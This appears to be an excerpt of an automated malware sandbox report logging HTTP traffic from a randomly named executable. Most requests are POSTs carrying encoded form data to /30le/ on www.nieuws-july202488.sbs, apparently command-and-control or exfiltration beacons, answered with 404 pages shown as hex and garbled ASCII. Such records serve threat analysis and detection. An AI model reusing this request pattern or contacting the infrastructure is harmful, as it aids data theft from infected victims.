                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749978162.0.215.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:00.184354067 CET835OUTPOST /30le/ HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.nieuws-july202488.sbs
                                                            Referer: http://www.nieuws-july202488.sbs/30le/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 64 67 6a 39 6c 69 43 31 5a 52 56 6c 4c 7a 6c 45 67 47 63 69 4a 5a 51 59 31 35 35 35 76 49 4c 78 56 58 31 61 4f 7a 70 72 39 50 52 6f 55 4b 53 6b 67 3d 3d
                                                            Data Ascii: MHJ0GXi=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSdgj9liC1ZRVlLzlEgGciJZQY1555vILxVX1aOzpr9PRoUKSkg==
                                                            Jan 11, 2025 04:17:00.769330025 CET1236INHTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Sat, 11 Jan 2025 03:17:00 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                            Data Ascii: 1353ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                            Jan 11, 2025 04:17:00.769350052 CET1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                            Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                            Jan 11, 2025 04:17:00.769428968 CET448INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                            Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                            Jan 11, 2025 04:17:00.769442081 CET1236INData Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                            Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                            Jan 11, 2025 04:17:00.769479036 CET1083INData Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                            Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749979162.0.215.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:02.725404024 CET855OUTPOST /30le/ HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.nieuws-july202488.sbs
                                                            Referer: http://www.nieuws-july202488.sbs/30le/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 30 49 6a 52 7a 30 50 58 6d 2b 4d 6c 6c 35 73 5a 55 52 75 41 42 62 66 36 34 46 52 50 34 61 76 56 2f 73 4f 70 72 68 2b 41 43 33 64 55 6e 47 4e 45 2b 67 68 36 61 65 6e 4d 49 76 38 64 62 6f 31 32 52 4e 66 59 45 36 6b 75 70 34 49 59 74 5a 76 6e 69 44 52 6c 31 39 67 45 67 62 79 47 63 72 32 36 45 58 51 70 48 32 75 46 48 30 4c 61 6f 4e 34 4c 52 31 73 64 57 53 54 2f 67 77 6c 31 4f 76 77 34 46 42 74 64 79 48 65 43 4b 77 38 59 68 72 63 33 64 50 75 4a 56 2b 7a 55 54 74 58 73 48 49 30 4b 71 37 6c 47 72 57 79 51 50 44 4c 71 69 57 79 49 4d 6d 57 64 42 5a 31 76 61 5a 32 4d 34 3d
                                                            Data Ascii: MHJ0GXi=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz0IjRz0PXm+Mll5sZURuABbf64FRP4avV/sOprh+AC3dUnGNE+gh6aenMIv8dbo12RNfYE6kup4IYtZvniDRl19gEgbyGcr26EXQpH2uFH0LaoN4LR1sdWST/gwl1Ovw4FBtdyHeCKw8Yhrc3dPuJV+zUTtXsHI0Kq7lGrWyQPDLqiWyIMmWdBZ1vaZ2M4=
                                                            Jan 11, 2025 04:17:03.331998110 CET1236INHTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Sat, 11 Jan 2025 03:17:03 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                            Data Ascii: 1353ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                            Jan 11, 2025 04:17:03.332042933 CET224INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                            Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZe
                                                            Jan 11, 2025 04:17:03.332119942 CET1236INData Raw: d5 07 c6 f5 72 19 bf f2 1f fd ca be bd 5e 6f 3e 18 7a 3d 12 72 73 4f ef 97 dd 08 e7 e5 c2 fd ac fd 0f 00 74 13 af 3f 53 fc 1b d5 0f 9c cf 64 02 44 fb bf 70 3e 3f ba 8d ba 88 ff e4 98 95 f9 70 71 23 70 9e fa 7f b1 cc d2 1d 11 5f c2 0d bd d4 5a 64
                                                            Data Ascii: r^o>z=rsOt?SdDp>?pq#p_ZdN/d%LPZpz4?2CYVvjCmQK!K4.fx:2ux1z2;|gYfuL>Ca!;@IMu.>%*L#]
                                                            Jan 11, 2025 04:17:03.332158089 CET1236INData Raw: b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5 29 65 9a 98 31 e6 3e f1 71 5a f5 17
                                                            Data Ascii: >*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGfp8R9
                                                            Jan 11, 2025 04:17:03.332192898 CET1236INData Raw: b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 5c ae 68 0e 59 fa 67 31 2e 4c 8d 6c a2 76 74 4c 77 49 cd ae
                                                            Data Ascii: vV-NZ).RiAw2OjTI G_57d,NW>}+\hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y*=I
                                                            Jan 11, 2025 04:17:03.332230091 CET71INData Raw: e2 dd 37 e6 7b a1 f1 bf ff 0b 94 82 d0 d1 e0 9a da 07 2a 7b 56 9b 79 a3 90 f7 f8 7a 84 af b5 f6 08 3f 07 b2 c7 cb 7b b9 6f bf fd 0f 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 d7 29 ca 2a 8d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 7{*{Vyz?{oA)*'0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749980162.0.215.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:05.309784889 CET1868OUTPOST /30le/ HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.nieuws-july202488.sbs
                                                            Referer: http://www.nieuws-july202488.sbs/30le/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 38 49 67 69 4c 30 50 32 6d 2b 4e 6c 6c 35 71 70 55 63 75 41 42 47 66 36 77 42 52 50 45 73 76 58 33 73 50 4b 6a 68 79 6c 69 33 47 45 6e 47 53 55 2b 68 6c 36 61 78 6e 4e 34 52 38 64 4c 6f 31 32 52 4e 66 62 63 36 30 50 70 34 4f 59 74 65 6f 6e 69 50 56 6c 31 46 67 45 6f 6c 79 41 41 37 32 4b 6b 58 51 4a 58 32 39 6e 2f 30 55 4b 6f 31 37 4c 52 39 73 64 62 49 54 2f 73 43 6c 33 75 4a 77 36 6c 42 75 36 66 65 4f 51 53 79 6d 59 56 67 41 47 31 70 6a 6f 46 74 31 57 65 4f 66 50 6e 33 35 34 43 2f 74 33 62 33 77 55 65 46 4c 70 71 61 31 71 59 43 58 4c 38 39 67 50 69 52 6b 4d 58 2b 57 43 38 48 6d 76 4c 67 36 70 5a 32 66 66 71 53 72 6e 78 75 53 65 45 74 4f 73 79 31 56 34 55 64 2f 75 43 6d 79 41 7a 67 52 56 76 36 30 56 31 55 33 33 39 55 2b 61 78 69 4f 58 42 42 4a 59 55 46 56 46 4f 53 4e 74 71 57 6b 68 64 31 6a 77 49 39 6a 4a 44 33 77 58 4d 4b 6c 67 4a 53 2b 43 52 56 78 4c [TRUNCATED]
                                                            Data Ascii: MHJ0GXi=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz8IgiL0P2m+Nll5qpUcuABGf6wBRPEsvX3sPKjhyli3GEnGSU+hl6axnN4R8dLo12RNfbc60Pp4OYteoniPVl1FgEolyAA72KkXQJX29n/0UKo17LR9sdbIT/sCl3uJw6lBu6feOQSymYVgAG1pjoFt1WeOfPn354C/t3b3wUeFLpqa1qYCXL89gPiRkMX+WC8HmvLg6pZ2ffqSrnxuSeEtOsy1V4Ud/uCmyAzgRVv60V1U339U+axiOXBBJYUFVFOSNtqWkhd1jwI9jJD3wXMKlgJS+CRVxLcYnQ3sHsj9oyijWcEVocXk8PTYhp+IvTK5V6Hg4g/iHKPLsBp6iuklC0S17DZtZQYkn7n8xxWwGrJu0yx/mW7zD0TV6HF0508GLebv02dfuXf9PgdLeXnkENODKXuOzOgKGK9OWHAW6y+PmL8wBM1REQz0cIgiXVOPOKOIYMY2m4XoLUPks+AJaYDvmNCUC3C/zeybABZaKl60lYx2MOrSbWIhgErA3M5WjSUzo+GaAEDbmL0kQEJdBfBonCn6xRvxjptgubkYiBgMyeTT60s+Atk/uReLCs80gur27eBfHMq1Cive91Vwjoo9EiSSjYMqd5utHNMPp20oTzsD2kQsBKe/fSH2WOiIjDUBlEh6AJlXg5QFOupT/8FSWDlFDQZXpGtBouJSz2k0sow4B4U0AIDzjfHaLiPlBJPPHdJEIthk7poHIuH2RJJa+o5VhgBA/0dMo0pmX5NRF20tpU6COsmtJsWl5ZIcHTZHMzkOzlZAu4cExzgof6EBrAdG8bIUdI0oSeeK86R4Hp+67HXG+U9pm++ZP+QTVq8niaRfljnn+7vUKD9slhMvDOegkzYzL6WDNL8RJG0gAg8iWp3sI0qeK/30SuxQtdzzz/Ke7YWCVfWk8escX2isnartsyH5t8OEJlTUiQn3gwKDvOB4d4opjOEV1Kpg [TRUNCATED]
                                                            Jan 11, 2025 04:17:05.895186901 CET1236INHTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Sat, 11 Jan 2025 03:17:05 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 35 44 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                            Data Ascii: 135DZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                            Jan 11, 2025 04:17:05.895307064 CET1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                            Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                            Jan 11, 2025 04:17:05.895327091 CET448INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                            Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                            Jan 11, 2025 04:17:05.895339012 CET1236INData Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                            Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                            Jan 11, 2025 04:17:05.895351887 CET1078INData Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                            Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749981162.0.215.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:08.048028946 CET561OUTGET /30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:08.515913010 CET1236INHTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            date: Sat, 11 Jan 2025 03:17:08 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
